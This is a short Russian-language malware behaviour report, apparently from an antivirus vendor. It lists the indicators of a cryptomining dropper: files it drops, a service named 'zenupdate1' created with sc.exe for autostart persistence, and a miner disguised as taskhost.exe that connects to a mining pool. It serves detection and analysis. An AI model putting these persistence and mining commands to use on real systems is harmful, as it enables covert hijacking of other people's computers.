Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\zenupdate1] 'Start' = '00000002'
- [<HKLM>\SYSTEM\ControlSet001\Services\zenupdate1] 'ImagePath' = '%WINDIR%\Windows\1.exe'
- %TEMP%\RarSFX0\CP.exe
- %TEMP%\RarSFX1\CP1.exe
- %TEMP%\RarSFX1\CP2.exe
- %WINDIR%\Windows\run.bat
- %WINDIR%\Windows\1.exe
- %WINDIR%\Windows\taskhost.exe
- %WINDIR%\Windows\1.vbs
- %TEMP%\RarSFX2\1.bat
- %TEMP%\RarSFX2\3.bat
- %TEMP%\RarSFX2\2.lnk
- %TEMP%\RarSFX2\1.bat
- %TEMP%\RarSFX2\2.lnk
- %TEMP%\RarSFX2\3.bat
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\RarSFX0\CP.exe' -p8192
- '%TEMP%\RarSFX1\CP1.exe'
- '%WINDIR%\Windows\1.exe'
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Windows\1.vbs"
- '%WINDIR%\Windows\taskhost.exe' -o stratum+tcp://fcn-xmr.pool.minergate.com:45590 -u fizerator@yandex.ru -p x -k --donate-level=1
- '%TEMP%\RarSFX1\CP2.exe'
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\Windows\run.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX2\3.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX2\1.bat" "
- '<SYSTEM32>\sc.exe' create zenupdate1 binPath= %WINDIR%\Windows\1.exe DisplayName= Zenupdate1 type= own start= auto